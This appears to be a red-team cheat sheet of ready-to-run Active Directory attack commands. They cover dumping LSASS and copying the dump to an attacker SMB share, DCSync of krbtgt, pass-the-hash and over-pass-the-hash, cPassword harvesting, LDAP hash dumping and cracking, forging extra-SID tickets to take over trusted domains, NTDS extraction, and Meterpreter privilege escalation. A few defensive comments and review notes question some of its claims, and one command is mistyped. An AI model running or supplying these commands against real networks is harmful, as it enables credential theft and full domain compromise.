Exploitation Tricks

Obfuscation

# There are many ways to obfuscate content
# PyFuscation (https://github.com/CBHue/PyFuscation) brings a few small, useful features
$ python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1 


“Double Hop” - What is it and how to solve ?

# Great resource (french)
http://inf0sec.fr/article-16.php

# TL;DR
# Two logon types
# Network Logon --> Ex : WinRM through PtH (Windows won't store credentials)
# Non-Network Logon --> Ex : RDP, entering the password directly, with Windows storing it

# In order to run privileged commands (typically, psexec on a DC),
# Windows needs to have credentials in the Logon Session
# If the authentication is a "Network Logon", there are no creds in the session and the command can't be executed

# Solution : local pass the hash (or runas)
# Mimikatz


Using Powershell AD Module without RSAT

# The secret to being able to run AD enumeration commands from the AD PowerShell module
# is the DLL located in C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management

# You can just grab it on a system with RSAT and drop it on the target
Import-Module .\Microsoft.ActiveDirectory.Management.dll

# Then you can use the module...
Get-Command get-adcom*

# Don't need admin rights !


Dumping LSASS

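# If you are SYSTEM and need creds, you can dump lsass.exe and then process the dump locally with Mimikatz
# Defender's view: a full memory read of lsass.exe shows up as a process-access event
# (e.g. Sysmon event ID 10 with lsass.exe as the target), and LSA protection (RunAsPPL)
# or Credential Guard limits what such a dump can yield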
procdump.exe -ma lsass.exe lsadump.dmp
copy lsadump.dmp \\IP\yourshare\lsadump.dmp

# Then mimikatz...
privilege::debug
sekurlsa::minidump lsadump.dmp
sekurlsa:logonPasswords /full
# You can also remotely dump lsass and then process it locally

# Method 1
# Open a SMB Server, drop mimikatz or procdump and get your output back to your SMB Server

# Method 2
# https://github.com/aas-n/spraykatz
# It will mass dump LSASS and process them locally to get outputs
./spraykatz.py -d company.local -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24


DCSync using misconfigured AD

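# These replication rights on the domain object can be abused to sync passwords
# (the GUIDs are the ObjectType values matched by the AD Module filter below)
# DS-Replication-Get-Changes                 (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
# DS-Replication-Get-Changes-All             (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
# DS-Replication-Get-Changes-In-Filtered-Set (89e95b76-444d-4c62-991a-0facbeda640c)
# By default they are held by domain controllers and the built-in administrative groups
# (plus directory-sync service accounts where deployed), so any other principal holding them is worth investigating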
http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/

# Inspecting privileges
# Using PowerView
Get-ObjectAcl -Identity "dc=offense,dc=local" -ResolveGUIDs | ? {$_.SecurityIdentifier -match "S-1-5-21-2552734371-813931464-1050690807-1106"}

# Using the AD Module
Import-Module ActiveDirectory
(Get-Acl "ad:\dc=offense,dc=local").Access | ? {$_.IdentityReference -match 'spotless' -and ($_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c" ) }

# You can just use mimikatz to dump if you have these rights
mimikatz> lsadump::dcsync /user:krbtgt


Over-Pass-The-Hash

http://inf0sec.fr/article-17.php

# OPtH does not use LSASS; it requests a TGT from the DC using the NT hash

# First ask a TGT for your user
Rubeus.exe asktgt /user:<redacted> /rc4:<redacted>

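# Only one TGT can be loaded in an existing Logon Session
# To avoid any trouble, you can create a new hidden process (it generates a type 1 event-ID)
# NOTE(review): a netonly process creation is usually recorded as a 4624 logon with
# logon type 9 (NewCredentials) - confirm the event type stated above before building a detection on it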
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe"

# Then pass the ticket to the new session
Rubeus.exe ptt /ticket:<ticket en base64> /luid:0x4a0717f


Extracting NTLM hashes from SAM database

# samdump2 allows you to extract NTLM hashes from the SAM database
# You need to have SAM and SYSTEM files locally
samdump2 SYSTEM SAM > hashes.txt


From non-auth user to local admin in 3 steps

# Nullsession
net use \\dc\ipc$ "" /u:""

# Search for cPassword entries in the GPOs:
dir \\dc\sysvol\contoso.corp\Policies -r -I *.xml | Select-String cPassword >> dump.txt

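# Decrypt the cPassword
# (the encryption key is the same everywhere and publicly documented, so cPassword entries
# have to be removed from SYSVOL and the affected passwords changed, not just left unused)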
gpp-decrypt <string>


Getting and cracking LDAP user hash

# STEP 1: Dump target user hash:
ldapsearch –x –h <LDAP_IPAddr> -D "cn=Directory Manager" -w <password> -b 'uid=<target_username>,cn=users,cn=accounts,dc=<DOMAIN>,dc=COM' uid userpassword krbprincipalkey sambalmpassword sambantpassword

# STEP 2: The ‘userpassword::’ and ‘krbprincipalkey::’ values are base64-encoded, so you now need to decode them:
echo 'e1NTSEF9dHZEaUZ4ejJTUkRBLzh1NUZSSGVIT2N4WkZMci9OYktQNHNLNWc9PQ==' | base64 --decode
{SSHA}tvDiFxz2SRDA/8u5FRHeHOcxZFLr/NbKP4sK5g==

# STEP 3: Place your decoded hash into hash.txt file and fire up Hashcat mode ‘111’ and attempt to crack the password hash:
hashcat –a 0 –m 111 hash.txt dict.txt


From one domain to another

# Hash/password replay to find one user on the second domain
$ crackmapexec smb <ip> -u user -p -H hash --shares
$ impacket/examples/smbclient DOMAIN/USER@IP -hashes <hash>

# Look for things like automated tasks run by admins
# Write access
# net user foo fooPassword /add /y
# net group "Domain Admins" foo /add

$ psexec.py domain/user@ip

# Test trust relationship
$ nltest /trusted_domain
$ nltest /dclist:<domain>

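# Create a new ticket for the second domain with the extra-sid
# nthash → compromised krbtgt hash
# domain-sid → SID of the compromised domain
# domain → already compromised domain
# extra-sid → SID of the target domain with RID 519 appended (519 = Enterprise Admins)
# NOTE(review): this relies on the trust not filtering SIDs; SID filtering / quarantine on the
# trust is the control that strips such an extra SID - confirm the trust settings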
$ ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519

# Exec and use the ticket
$ /impacket/examples/psexec.py -k -n -debug DOMAIN/user@host_DC

# Dump NTDS
$ proxychains secretsdump.py -k -no-pass qsec@DCFIL.PRAMAFIL.CORP -use-vss

# look for the admin workstation

# go RDP (or psexec also)
$ crackmapexec smb <ip> -u user -H hash -M rdp -o ACTION=enable


Powershell through Metasploit

# You can load the powershell extension and get a PowerShell-like shell
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > cd "C:\Users\kostas\Desktop"
PS > ls

# Then you can run Powershell scripts
PS > ./MS16-032.ps1
PS > Import-Module ./MS16-032.ps1
PS > Invoke-MS16-032